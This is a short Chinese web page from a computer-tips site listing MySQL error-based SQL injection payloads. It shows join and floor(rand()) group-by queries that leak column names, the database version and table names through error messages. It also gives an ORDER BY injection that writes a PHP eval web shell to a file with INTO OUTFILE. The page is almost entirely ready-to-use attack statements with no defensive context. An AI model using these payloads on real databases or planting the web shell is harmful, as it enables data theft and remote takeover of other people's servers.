当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

关于mysql报错注入的几个语句

时间:2013/4/19 12:10:00 作者:平凡之路 来源:xuhantao.com 浏览:

报错注入,www.xuhantao.com,涛涛电脑知识网,报user表中的字段:
select * from (select * from user a join user b) c;
select * from (select * from user a join user b using (host,user)) c;

报错注入
select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a;
select 1 from (select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a;

order by注入导一句话
select '<?php eval($_POST[ln]);?>' from user order by if((select 'abc' into outfile '/tmp/2.php'),1,1) limit 1,1;

相关文章
  • 没有相关文章
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1